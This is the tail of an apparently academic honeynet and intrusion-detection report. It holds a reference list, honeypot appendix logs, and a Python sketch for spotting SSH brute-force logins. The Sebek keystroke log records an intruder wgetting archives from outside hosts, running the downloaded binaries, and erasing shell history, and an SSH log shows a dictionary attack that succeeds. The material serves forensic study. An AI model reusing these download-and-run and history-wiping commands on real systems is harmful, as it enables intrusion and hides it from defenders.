[40] Cohen, Frederick B., Protection and Security on the Information Superhighway, John Wiley and Sons, Inc., 1995.
[41] P. Innella, "A Brief History of Network Security and the Need for Adherence to the Software Process Model," Information Security, 2008, pp. 1-15.
[42] Lipson HF. Tracking and tracing cyber-attacks: technical challenges and global policy issues. Technical report, CERT Coordination Center; November 2002.
[43] CERT, "CERT Statistics (Historical)," Incident Reports Received, 2009, p. 1.
[44] W. Stallings, Internet Security Handbook, IDG Books Worldwide, Inc., 1995.
[45] Alexander, Michael, The Underground Guide to Computer Security, Addison-Wesley Publishing Company, 1996.
[46] CERT/CC, "CERT® Advisory CA-2003-04 MS-SQL Server Worm," CERT/CC, Carnegie Mellon University, 2003, p. 1.
[47] CERT/CC, "CERT® Advisory CA-2003-20 W32/Blaster worm," CERT/CC, Carnegie Mellon University, 2003, p. 1.
[48] CERT-In, "CERT-In Incident Note CIIN-2004-06," CERT-In, 2004, p. 1.
[49] US-CERT, "Technical Cyber Security Alert TA09-088A," National Cyber Alert System, 2009, p. 1.
[50] W.H. Baker, A. Hutton, C.D. Hylender, C. Novak, C. Porter, B. Sartin, and P. Tippett, "2009 Data Breach Investigations Report," Verizon Business, 2009.
[51] S. Northcutt and J. Novak, Network Intrusion Detection, New Riders, 2003.
[52] C. Kreibich and J. Crowcroft, "Honeycomb - creating intrusion detection signatures using Honeypots," In Proceedings of the 2nd Workshop on Hot Topics in Networks (HotNets-II), 2003.
[53] J. Newsome, B. Karp, and D. Song, "Polygraph: Automatically generating signatures for polymorphic worms," Proc. of the 2005 IEEE Symposium on Security and Privacy, pp. 226-241, May 2005.
[54] M.M. Mohammed, H.A. Chan, and N. Ventura, "Honeycyber: automated signature generation for zero-day polymorphic worms," Proc. of the IEEE Military Communications Conference, MILCOM, 2008, pp. 1-6.
[55] H.-A. Kim and B. Karp, "Autograph: Toward automated, distributed worm signature detection," Proc. of 13th USENIX Security Symposium, San Diego, CA, Aug., 2004.
[56] S. Singh, C. Estan, G. Varghese, and S. Savage, "Automated worm fingerprinting," Proc. of the 6th conference on Symposium on Operating Systems Design and Implementation (OSDI), Dec, 2004.
[57] J. Levine, R.L. Bella, H. Owen, D. Contis, and B. Culver, "The use of Honeynets to detect exploited systems across large enterprise networks," Proc. of 2003 IEEE Workshops on Information Assurance, New York, Jun, 2003, pp. 92-99.
[58] Niels Provos. Honeyd - A Virtual Honeypot Daemon. In 10th DFN-CERT Workshop, Hamburg, Germany, February 2003.
[59] J. Newsome, B. Karp, and D. Song, "Polygraph: Automatically generating signatures for polymorphic worms," Proc. of the 2005 IEEE Symposium on Security and Privacy, pp. 226-241, May, 2005.
[60] Z. Li, M. Sanghi, Y. Chen, M.-Y. Kao, and B. Chavez, "Hamsa: Fast Signature Generation for Zero-day Polymorphic Worms with Provable Attack Resilience," Proc. of the IEEE Symposium on Security and Privacy, Oakland, CA, May, 2006.
[61] L. Cavallaro, A. Lanzi, L. Mayer, and M. Monga, "LISABETH: Automated Content-Based Signature Generator for Zero-day Polymorphic Worms," Proc. of the fourth international workshop on Software engineering for secure systems, Leipzig, Germany, May, 2008.
[62] M.M. Mohammed, H.A. Chan, and N. Ventura, "Honeycyber: automated signature generation for zero-day polymorphic worms," Proc. of the IEEE Military Communications Conference, MILCOM, 2008, pp. 1-6.
[63] R. Sommer and V. Paxson. Enhancing byte-level network intrusion detection signatures with context. In 10th ACM Conference on Computer and Communication Security (CCS), Washington, DC, October 2003.
[64] R. Agrawal, T. Imielinski, and A. Swami. Mining association rules between sets of items in large databases. In ACM SIGMOD International Conference on Management of Data, 1993.
[65] F. Pouget and M. Dacier. Honeypot-based forensics. In AusCERT Asia Pacific Information technology Security Conference 2004 (AusCERT2004), Brisbane, Australia, May 2004.
[66] K. Julisch. Clustering intrusion detection alarms to support root cause analysis. ACM Transactions on Information and System Security (TISSEC), 6(4):443-471, November 2003.
[67] M. Christodorescu, S. Seshia, S. Jha, D. Song, and R. E. Bryant. Semantics-aware malware detection. In IEEE Symposium on Security and Privacy, Oakland, California, May 2005.
[68] J. Jung, V. Paxson, A. W. Berger, and H. Balakrishnan. Fast port-scan detection using sequential hypothesis testing. In IEEE Symposium on Security and Privacy, Oakland, California, May 2004.
[69] S. Staniford, J. A. Hoagland, and J. M. McAlerney. Practical automated detection of stealthy portscans. Journal of Computer Security, 10(1/2):105-136, 2002.
[70] V. Yegneswaran, J. Giffin, P. Barford, and S. Jha, "An architecture for generating semantics-aware signatures," Proc. of the 14th conference on USENIX Security Symposium, 2005.
[71] Yong Tang, Shigang Chen, "An Automated Signature-Based Approach against Polymorphic Internet Worms," IEEE Transaction on Parallel and Distributed Systems, pp. 879-892, July 2007.
[72] Yi-Min Wang et al, “Automated Web Patrol with Strider HoneyMonkeys: Finding Web Sites That Exploit Browser Vulnerabilities,” Proc. of the 4th ACM SIGPLAN/SIGOPS international conference on Virtual execution environments, pp. 171-180, Seattle, WA, USA, 2008.
[73] W. E. Leland, M. S. Taqqu, W. Willinger, and D. V. Wilson, “On the self-similar nature of ethernet traffic (extended version),” IEEE/ACM Trans. Networking, vol. 2, pp. 1-15, Feb. 1994.
[74] D.E. Denning, "An Intrusion-Detection Model," IEEE Transactions on Software Engineering, SE-13, 1987, pp. 222-232.
[75] Varun Chandola, Arindam Banerjee, and Vipin Kumar, Anomaly Detection: A Survey, ACM Computing Surveys, Vol. 41(3), Article 15, July 2009.
[76] V.V. Phoha, "The Springer Internet Security Dictionary," Springer-Verlag. Phua, C., Alahakoon, D., and Lee, V, vol. 61, 2002, pp. 50-59.
[77] Wikipedia, "Behaviour," 2010, p. 1.
[78] J.M. Estevez-Tapiador, P. Garcia-Teodoro and J.E. Diaz-Verdejo, “Anomaly detection methods in wired networks: a survey and taxonomy”, Computer Communications 27, pp. 1569-1584, 2004.
[79] S.Y. Lim and A. Jones, "Network Anomaly Detection System: The State of Art of Network Behaviour Analysis," Security, 2008, pp. 459-465.
[80] K. Scarfone and P. Mell, Guide to Intrusion Detection and Prevention Systems (IDPS), tech. report 800-94, Nat’l Inst. Standards and Technology, US Dept. of Commerce, 2007.
[81] M. Pe, M. Grill, and J. Stiborek, "Adaptive Multiagent System for Network Traffic Monitoring," Intelligent Systems, IEEE, vol. 24, 2009, pp. 16-25.
[82] "Fuzzy Clarity: Using Fuzzy Hashing Techniques to Identify Malicious Code," 2007, pp. 1-18.
[83] Tridgell, A. (2003). SpamSum. http://samba.org/ftp/unpacked/junkcode/spamsum/README
[84] "Unveiling the Security Illusion: The need for active network forensics," Solera Networks, 2010, p. 11.
[85] M. Li and P.M.B. Vitányi. An Introduction to Kolmogorov Complexity and its Applications, Springer-Verlag, New York, 2nd Edition, 1997.
[86] R. Cilibrasi and P. Vitányi, "Clustering by compression," IEEE Trans. Information Theory, vol. 51, no. 4, 2005, pp. 1523-1545.
[87] R. Cilibrasi, The CompLearn Toolkit, 2003, http://complearn.sourceforge.net/.
[88] S. Wehner, "Analyzing Worms and Network Traffic using Compression," Work, 2008.
[89] H. Flake, "Structural comparison of executable objects," In DIMVA, 2004, pp. 161-173.
[90] E. Carrera and F.C. Team, "2. Programming ida pro," 2004, pp. 187-197.
[91] A. Kulkarni and S. Bush. Active network management and kolmogorov complexity, 2001. OpenArch 2001, Anchorage, Alaska.
[92] S. Evans and B. Barnett, "Network Security Through Conservation of Complexity," MILCOM, 2002.
[93] A. Kulkarni, S. Bush, and S. Evans, "Detecting distributed denial-of-service attacks using kolmogorov complexity metrics," 2001.
GE CRD Technical Report, 2001.
[94] M. Bailey, J. Oberheide, J. Andersen, Z.M. Mao, F. Jahanian, and J. Nazario, "Automated Classification and Analysis of Internet Malware," Electrical Engineering, 2007, pp. 1-18.

APPENDICES

APPENDIX - A

Sebek Logs

[2008-09-20 23:01:44 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:01:48 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#who
[2008-09-20 23:02:54 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cat /proc/cpuinfo
[2008-09-20 23:02:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:03:07 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ps x
[2008-09-20 23:03:14 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#kill -9 10796
[2008-09-20 23:03:15 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:03:16 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:03:18 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#passwd
[2008-09-20 23:03:36 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#uname -a
[2008-09-20 23:04:14 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls[BS][BS][BS]last
[2008-09-20 23:04:23 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ps x
[2008-09-20 23:04:24 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#history
[2008-09-20 23:04:27 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd .tmp
[2008-09-20 23:04:28 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:04:29 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp
[2008-09-20 23:04:29 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:04:32 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /var/tmp
[2008-09-20 23:04:32 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:04:34 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp
[2008-09-20 23:04:36 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget www.idol.altervista.org/fish.tgz
[2008-09-20 23:04:53 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#tar xzvf fish.tgz
[2008-09-20 23:04:53 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd a
[2008-09-20 23:04:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#chmod +x *
[2008-09-20 23:05:03 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#./x 41.243 22
[2008-09-20 23:05:15 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:05:17 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp
[2008-09-20 23:05:17 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#s
[2008-09-20 23:05:19 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:05:20 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:05:23 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#rm -rf a
[2008-09-20 23:05:29 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#[U-ARROW][BS]fas[BS][BS]ish.tgz
[2008-09-20 23:05:30 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:05:32 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd /tmp
[2008-09-20 23:06:14 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget www12.asphost4free.com/postcard/fast.tar.gz
[2008-09-20 23:06:57 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:06:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:07:00 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:07:03 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd va/rmtp
[2008-09-20 23:07:04 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#ls
[2008-09-20 23:07:08 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd v[BS]/tmp
[2008-09-20 23:07:09 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget www12.asphost4free.com/postcard/fast.tar.gz
[2008-09-20 23:07:24 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#wget members.lycos.co.uk/carbalano/bido.jpg
[2008-09-20 23:07:52 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#curl
[2008-09-20 23:07:58 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#w
[2008-09-20 23:07:59 Host:130.195.4.20 UID:1001 PID:11217 FD:0 INO:3 COM:bash ]#cd
[2008-09-20 23:08:14 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#w
[2008-09-20 23:08:17 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd /tmp
[2008-09-20 23:08:18 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls
[2008-09-20 23:08:32 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#wget www12.asphost4free.com/postcard/fast.tar.gz
[2008-09-20 23:10:29 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd
[2008-09-20 23:10:29 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls
[2008-09-20 23:10:30 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#w
[2008-09-20 23:12:45 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd /tmp
[2008-09-20 23:12:46 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls
[2008-09-20 23:12:53 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#tar zxvf fast.tar.gz
[2008-09-20 23:12:55 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd fast
[2008-09-20 23:12:57 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#chmod +x *
[2008-09-20 23:13:00 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#./linux
[2008-09-20 23:13:02 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#cd
[2008-09-20 23:13:02 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#ls
[2008-09-20 23:13:02 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#w
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset HISTFILE
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset BASHFILE
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset HISTSAVE
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#history -n
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#unset WATCH
[2008-09-20 23:13:08 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#export HISTFILE=/dev/null
[2008-09-20 23:13:09 Host:130.195.4.20 UID:1001 PID:12540 FD:0 INO:2 COM:bash ]#rm -rf .bash_history
[2008-09-21 02:23:12 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:19 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77360 COM:bash ]#Documents
[2008-09-21 02:23:19 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd Do
[2008-09-21 02:23:19 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:21 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd ..
[2008-09-21 02:23:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77371 COM:bash ]#Pictures
[2008-09-21 02:23:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd Pic
[2008-09-21 02:23:25 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:26 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd ..
[2008-09-21 02:23:30 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77379 COM:bash ]#/tmp
[2008-09-21 02:23:30 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd /t
[2008-09-21 02:23:30 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:38 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77387 COM:bash ]#fast
[2008-09-21 02:23:38 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd fas
[2008-09-21 02:23:39 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:23:43 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd ..
[2008-09-21 02:23:49 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#w
[2008-09-21 02:25:18 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:25:20 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd fast
[2008-09-21 02:25:21 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:25:26 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd r
[2008-09-21 02:25:27 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:25:33 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77464 COM:bash ]#rinsult.e
[2008-09-21 02:25:34 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat rawa[BS][BS][BS]in
[2008-09-21 02:25:36 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cd ..
[2008-09-21 02:25:36 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:25:45 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls -l
[2008-09-21 02:25:57 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77484 COM:bash ]#mech3.users
[2008-09-21 02:25:57 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77484 COM:bash ]#mech1.users
[2008-09-21 02:25:57 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77484 COM:bash ]#mech2.users
[2008-09-21 02:25:58 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77493 COM:bash ]#mech1.users
[2008-09-21 02:25:59 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat me1
[2008-09-21 02:26:05 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#[U-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][BS]2
[2008-09-21 02:26:13 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:26:17 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77507 COM:bash ]#linux
[2008-09-21 02:26:17 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat li
[2008-09-21 02:26:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#[ESC][?1;2c[ESC][?1;2c[ESC][?1;2c
[2008-09-21 02:26:24 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#
[2008-09-21 02:26:25 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#ls
[2008-09-21 02:26:35 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77519 COM:bash ]#m.pid
[2008-09-21 02:26:35 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat m.p
[2008-09-21 02:26:39 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77528 COM:bash ]#m.ses
[2008-09-21 02:26:39 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77528 COM:bash ]#m.set
[2008-09-21 02:26:40 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:77536 COM:bash ]#m.ses
[2008-09-21 02:26:40 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#cat m.ses
[2008-09-21 02:27:23 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#e[BS]w
[2008-09-21 02:27:25 Host:130.195.4.20 UID:1001 PID:12879 FD:0 INO:2 COM:bash ]#exit

SSH Logs

Sep 21 10:51:55 paul-desktop sshd[8838]: Failed password for invalid user t1na from 82.99.173.209 port 60061 ssh2
Sep 21 10:51:58 paul-desktop sshd[8840]: Failed password for invalid user alexis from 82.99.173.209 port 60193 ssh2
Sep 21 10:52:00 paul-desktop sshd[8842]: Failed password for invalid user t1na from 82.99.173.209 port 60291 ssh2
Sep 21 10:52:00 paul-desktop sshd[8844]: Failed password for invalid user a from 82.99.173.209 port 60360 ssh2
Sep 21 10:52:02 paul-desktop sshd[8846]: Failed password for invalid user art from 82.99.173.209 port 60489 ssh2
Sep 21 10:52:04 paul-desktop sshd[8848]: Failed password for invalid user slim from 82.99.173.209 port 60587 ssh2
Sep 21 10:52:04 paul-desktop sshd[8850]: Failed password for invalid user logic from 82.99.173.209 port 60675 ssh2
Sep 21 10:52:05 paul-desktop sshd[8852]: Failed password for invalid user b from 82.99.173.209 port 60709 ssh2
Sep 21 10:52:07 paul-desktop sshd[8854]: Failed password for invalid user shortcut from 82.99.173.209 port 60838 ssh2
Sep 21 10:52:07 paul-desktop sshd[8855]: Failed password for invalid user desiree from 82.99.173.209 port 60912 ssh2
Sep 21 10:52:08 paul-desktop sshd[8858]: Failed password for invalid user eminem from 82.99.173.209 port 60986 ssh2
Sep 21 10:52:08 paul-desktop sshd[8860]: Failed password for invalid user diablo from 82.99.173.209 port 32783 ssh2
Sep 21 10:52:10 paul-desktop sshd[8862]: Failed password for invalid user haitac from 82.99.173.209 port 32886 ssh2
(...)
Sep 21 10:52:48 paul-desktop sshd[9016]: Failed password for invalid user maria from 82.99.173.209 port 38176 ssh2
Sep 21 10:52:49 paul-desktop sshd[9020]: Failed password for invalid user natasha from 82.99.173.209 port 38439 ssh2
Sep 21 10:52:50 paul-desktop sshd[9028]: Failed password for invalid user skywalker from 82.99.173.209 port 38688 ssh2
Sep 21 10:52:50 paul-desktop sshd[9022]: Failed password for invalid user conter from 82.99.173.209 port 38607 ssh2
Sep 21 10:52:50 paul-desktop sshd[9023]: Failed password for invalid user ha from 82.99.173.209 port 38608 ssh2
Sep 21 10:52:50 paul-desktop sshd[9024]: Failed password for invalid user claudius from 82.99.173.209 port 38613 ssh2
Sep 21 10:52:51 paul-desktop sshd[9030]: Failed password for invalid user maria from 82.99.173.209 port 38732 ssh2
Sep 21 10:52:52 paul-desktop sshd[9031]: Failed password for invalid user maryjane from 82.99.173.209 port 38767 ssh2
Sep 21 10:52:52 paul-desktop sshd[9033]: Failed password for invalid user putty from 82.99.173.209 port 38796 ssh2
Sep 21 10:52:52 paul-desktop sshd[9036]: Accepted password for john from 82.99.173.209 port 1372 ssh2
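
The SSH log above shows a dictionary attack: many failed password attempts from a single source address, followed by one accepted login. As an illustration only, the following minimal Python sketch counts failed attempts per source address and reports an accepted login that follows a run of failures. The function name summarize, the threshold parameter, and the regular expression are assumptions introduced here for illustration; they are not part of the honeynet tooling used in this report, and the pattern covers only the two sshd message types that appear in this appendix.

```python
import re

# Matches the two sshd message types shown in the SSH Logs of this appendix.
# Other sshd messages (e.g. public-key logins) are ignored in this sketch.
SSHD_LINE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def summarize(lines, threshold=10):
    """Count failed logins per source IP and list accepted logins that came
    from an IP which had already failed at least `threshold` times.

    `threshold` is a hypothetical tuning parameter, not a value taken from
    the report.
    """
    failures = {}      # ip -> number of failed password attempts seen so far
    compromised = []   # (ip, user, failures seen before the accepted login)
    for line in lines:
        match = SSHD_LINE.search(line)
        if match is None:
            continue  # not one of the two message types handled here
        ip = match.group("ip")
        if match.group("result") == "Failed":
            failures[ip] = failures.get(ip, 0) + 1
        elif failures.get(ip, 0) >= threshold:
            compromised.append((ip, match.group("user"), failures[ip]))
    return failures, compromised


# Last three entries of the SSH log in this appendix.
sample = [
    "Sep 21 10:52:52 paul-desktop sshd[9031]: Failed password for invalid user maryjane from 82.99.173.209 port 38767 ssh2",
    "Sep 21 10:52:52 paul-desktop sshd[9033]: Failed password for invalid user putty from 82.99.173.209 port 38796 ssh2",
    "Sep 21 10:52:52 paul-desktop sshd[9036]: Accepted password for john from 82.99.173.209 port 1372 ssh2",
]

failures, compromised = summarize(sample, threshold=2)
print(failures)
print(compromised)
```

The threshold is lowered to 2 in the usage lines only because the sample contains three entries; a larger value would be more appropriate when running over a complete log file.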